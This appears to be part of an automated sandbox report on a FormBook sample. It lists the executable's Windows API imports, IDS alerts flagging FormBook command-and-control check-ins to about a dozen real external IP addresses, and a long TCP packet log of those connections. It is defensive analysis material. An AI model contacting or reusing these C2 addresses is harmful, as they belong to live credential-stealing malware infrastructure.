EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain
                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                    2024-08-12T05:15:56.156882+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976480192.168.2.4213.145.228.16
                    2024-08-12T05:14:25.278013+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974780192.168.2.4208.91.197.27
                    2024-08-12T05:14:43.637779+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974980192.168.2.443.252.167.188
                    2024-08-12T05:15:49.902471+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976380192.168.2.4199.192.19.19
                    2024-08-12T05:16:23.205204+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977280192.168.2.4194.58.112.174
                    2024-08-12T05:15:14.267045+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975880192.168.2.423.251.54.212
                    2024-08-12T05:13:46.967798+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.4217.160.0.106
                    2024-08-12T05:15:42.288965+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976080192.168.2.4199.192.19.19
                    2024-08-12T05:12:53.078148+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514977980192.168.2.4104.21.45.56
                    2024-08-12T05:15:11.733973+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975780192.168.2.423.251.54.212
                    2024-08-12T05:16:17.398800+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514977180192.168.2.491.195.240.19
                    2024-08-12T05:16:14.936864+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977080192.168.2.491.195.240.19
                    2024-08-12T05:13:52.142938+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974180192.168.2.4217.160.0.106
                    2024-08-12T05:16:39.937120+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977780192.168.2.4104.21.45.56
                    2024-08-12T05:14:54.456190+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.4194.9.94.85
                    2024-08-12T05:16:25.748333+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977380192.168.2.4194.58.112.174
                    2024-08-12T05:15:47.365213+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976280192.168.2.4199.192.19.19
                    2024-08-12T05:14:48.710219+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975180192.168.2.443.252.167.188
                    2024-08-12T05:16:42.469573+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977880192.168.2.4104.21.45.56
                    2024-08-12T05:16:04.076895+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976780192.168.2.4213.145.228.16
                    2024-08-12T05:14:16.660530+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974480192.168.2.4208.91.197.27
                    2024-08-12T05:15:02.090377+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975580192.168.2.4194.9.94.85
                    2024-08-12T05:14:21.740501+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974680192.168.2.4208.91.197.27
                    2024-08-12T05:14:19.207640+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974580192.168.2.4208.91.197.27
                    2024-08-12T05:15:58.646857+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976580192.168.2.4213.145.228.16
                    2024-08-12T05:15:36.645488+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975980192.168.2.423.251.54.212
                    2024-08-12T05:14:46.413561+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975080192.168.2.443.252.167.188
                    2024-08-12T05:16:28.296861+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977480192.168.2.4194.58.112.174
                    2024-08-12T05:14:56.999620+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975380192.168.2.4194.9.94.85
                    2024-08-12T05:16:12.321101+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976980192.168.2.491.195.240.19
                    2024-08-12T05:14:41.119684+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974880192.168.2.443.252.167.188
                    2024-08-12T05:13:54.608641+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974280192.168.2.4217.160.0.106
                    2024-08-12T05:16:30.835820+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514977580192.168.2.4194.58.112.174
                    2024-08-12T05:16:37.390178+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977680192.168.2.4104.21.45.56
                    2024-08-12T05:15:09.208803+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975680192.168.2.423.251.54.212
                    2024-08-12T05:13:30.987934+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973880192.168.2.45.44.111.162
                    2024-08-12T05:16:09.779223+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976880192.168.2.491.195.240.19
                    2024-08-12T05:14:59.550719+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975480192.168.2.4194.9.94.85
                    2024-08-12T05:13:49.494279+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974080192.168.2.4217.160.0.106
                    2024-08-12T05:16:01.197323+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976680192.168.2.4213.145.228.16
                    2024-08-12T05:15:44.839054+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976180192.168.2.4199.192.19.19
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 12, 2024 05:13:30.321500063 CEST4973880192.168.2.45.44.111.162
                    Aug 12, 2024 05:13:30.326637983 CEST80497385.44.111.162192.168.2.4
                    Aug 12, 2024 05:13:30.326867104 CEST4973880192.168.2.45.44.111.162
                    Aug 12, 2024 05:13:30.329245090 CEST4973880192.168.2.45.44.111.162
                    Aug 12, 2024 05:13:30.334448099 CEST80497385.44.111.162192.168.2.4
                    Aug 12, 2024 05:13:30.987478018 CEST80497385.44.111.162192.168.2.4
                    Aug 12, 2024 05:13:30.987756014 CEST80497385.44.111.162192.168.2.4
                    Aug 12, 2024 05:13:30.987934113 CEST4973880192.168.2.45.44.111.162
                    Aug 12, 2024 05:13:30.992031097 CEST4973880192.168.2.45.44.111.162
                    Aug 12, 2024 05:13:30.997078896 CEST80497385.44.111.162192.168.2.4
                    Aug 12, 2024 05:13:46.318214893 CEST4973980192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:46.323235035 CEST8049739217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:46.323458910 CEST4973980192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:46.325484991 CEST4973980192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:46.330564022 CEST8049739217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:46.967302084 CEST8049739217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:46.967514038 CEST8049739217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:46.967797995 CEST4973980192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:47.827969074 CEST4973980192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:48.847737074 CEST4974080192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:48.853099108 CEST8049740217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:48.853334904 CEST4974080192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:48.856378078 CEST4974080192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:48.861386061 CEST8049740217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:49.493937016 CEST8049740217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:49.494103909 CEST8049740217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:49.494278908 CEST4974080192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:50.359200954 CEST4974080192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:51.379761934 CEST4974180192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:51.385121107 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.385339975 CEST4974180192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:51.388668060 CEST4974180192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:51.393821001 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.393851042 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.393878937 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.393909931 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.393938065 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.393985987 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.394015074 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.394041061 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:51.394232035 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:52.142559052 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:52.142712116 CEST8049741217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:52.142937899 CEST4974180192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:52.890465975 CEST4974180192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:53.943352938 CEST4974280192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:53.948518038 CEST8049742217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:53.948626995 CEST4974280192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:53.964392900 CEST4974280192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:53.969794989 CEST8049742217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:54.608198881 CEST8049742217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:54.608438015 CEST8049742217.160.0.106192.168.2.4
                    Aug 12, 2024 05:13:54.608640909 CEST4974280192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:54.613209963 CEST4974280192.168.2.4217.160.0.106
                    Aug 12, 2024 05:13:54.618283987 CEST8049742217.160.0.106192.168.2.4
                    Aug 12, 2024 05:14:16.205729961 CEST4974480192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:16.210832119 CEST8049744208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:16.210952997 CEST4974480192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:16.213109970 CEST4974480192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:16.218086004 CEST8049744208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:16.660264969 CEST8049744208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:16.660530090 CEST4974480192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:17.722182035 CEST4974480192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:17.727559090 CEST8049744208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:18.742513895 CEST4974580192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:18.747674942 CEST8049745208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:18.747879982 CEST4974580192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:18.749522924 CEST4974580192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:18.754420996 CEST8049745208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:19.207120895 CEST8049745208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:19.207639933 CEST4974580192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:20.265353918 CEST4974580192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:20.270575047 CEST8049745208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.284190893 CEST4974680192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:21.289638042 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.289725065 CEST4974680192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:21.291794062 CEST4974680192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:21.296895027 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.296955109 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.296983957 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297013044 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297039032 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297214031 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297240973 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297274113 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.297300100 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.740432978 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:21.740500927 CEST4974680192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:22.797768116 CEST4974680192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:22.802932978 CEST8049746208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:23.816530943 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:23.821928978 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:23.822139025 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:23.824186087 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:23.829262972 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.277790070 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.277841091 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.277877092 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.277923107 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.277952909 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:25.278012991 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:25.278012991 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:25.278012991 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:25.282165051 CEST4974780192.168.2.4208.91.197.27
                    Aug 12, 2024 05:14:25.287290096 CEST8049747208.91.197.27192.168.2.4
                    Aug 12, 2024 05:14:40.237220049 CEST4974880192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:40.242378950 CEST804974843.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:40.242475986 CEST4974880192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:40.244437933 CEST4974880192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:40.249604940 CEST804974843.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:41.119555950 CEST804974843.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:41.119601965 CEST804974843.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:41.119683981 CEST4974880192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:41.749447107 CEST4974880192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:42.769109011 CEST4974980192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:42.774430990 CEST804974943.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:42.774512053 CEST4974980192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:42.776278019 CEST4974980192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:42.781428099 CEST804974943.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:43.637432098 CEST804974943.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:43.637537956 CEST804974943.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:43.637778997 CEST4974980192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:44.280702114 CEST4974980192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:45.301139116 CEST4975080192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:45.306482077 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.306570053 CEST4975080192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:45.309333086 CEST4975080192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:45.314368010 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314397097 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314445972 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314471006 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314516068 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314542055 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314588070 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314614058 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:45.314639091 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:46.413259029 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:46.413491011 CEST804975043.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:46.413561106 CEST4975080192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:46.811965942 CEST4975080192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:47.830020905 CEST4975180192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:47.835953951 CEST804975143.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:47.837692976 CEST4975180192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:47.839350939 CEST4975180192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:47.845561028 CEST804975143.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:48.710083961 CEST804975143.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:48.710107088 CEST804975143.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:48.710218906 CEST4975180192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:48.712660074 CEST4975180192.168.2.443.252.167.188
                    Aug 12, 2024 05:14:48.717509031 CEST804975143.252.167.188192.168.2.4
                    Aug 12, 2024 05:14:53.805129051 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:53.810091972 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:53.813884020 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:53.818006992 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:53.822923899 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.455980062 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456032038 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456065893 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456108093 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456140995 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456176043 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456190109 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:54.456190109 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:54.456207991 CEST8049752194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:54.456222057 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:54.456250906 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:55.327753067 CEST4975280192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.349347115 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.354357004 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.359544992 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.359544992 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.364479065 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999478102 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999519110 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999552011 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999583006 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999618053 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999619961 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.999620914 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:56.999649048 CEST8049753194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:56.999711990 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:57.874667883 CEST4975380192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:58.892971039 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:58.898636103 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.898781061 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:58.900903940 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:58.906589031 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.906651020 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.906666994 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.907195091 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.907211065 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.907972097 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.907987118 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.908014059 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:58.908030033 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550528049 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550597906 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550648928 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550678968 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550715923 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550719023 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:59.550749063 CEST8049754194.9.94.85192.168.2.4
                    Aug 12, 2024 05:14:59.550793886 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:14:59.551125050 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:00.405844927 CEST4975480192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:01.424613953 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:01.429716110 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:01.429991007 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:01.431474924 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:01.436420918 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090054989 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090114117 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090151072 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090183020 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090220928 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090253115 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:02.090377092 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:02.090378046 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:02.090807915 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:02.093236923 CEST4975580192.168.2.4194.9.94.85
                    Aug 12, 2024 05:15:02.098108053 CEST8049755194.9.94.85192.168.2.4
                    Aug 12, 2024 05:15:07.681262016 CEST4975680192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:07.687453032 CEST804975623.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:07.687695980 CEST4975680192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:07.689435959 CEST4975680192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:07.696104050 CEST804975623.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:09.208802938 CEST4975680192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:09.255970955 CEST804975623.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:10.221438885 CEST4975780192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:10.226543903 CEST804975723.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:10.229866028 CEST4975780192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:10.233745098 CEST4975780192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:10.238708973 CEST804975723.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:11.733973026 CEST4975780192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:11.779934883 CEST804975723.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.753360987 CEST4975880192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:12.758639097 CEST804975823.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.758848906 CEST4975880192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:12.761729956 CEST4975880192.168.2.423.251.54.212
                    Aug 12, 2024 05:15:12.766907930 CEST804975823.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.766938925 CEST804975823.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.766966105 CEST804975823.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.766992092 CEST804975823.251.54.212192.168.2.4
                    Aug 12, 2024 05:15:12.767038107 CEST804975823.251.54.212192.168.2.4
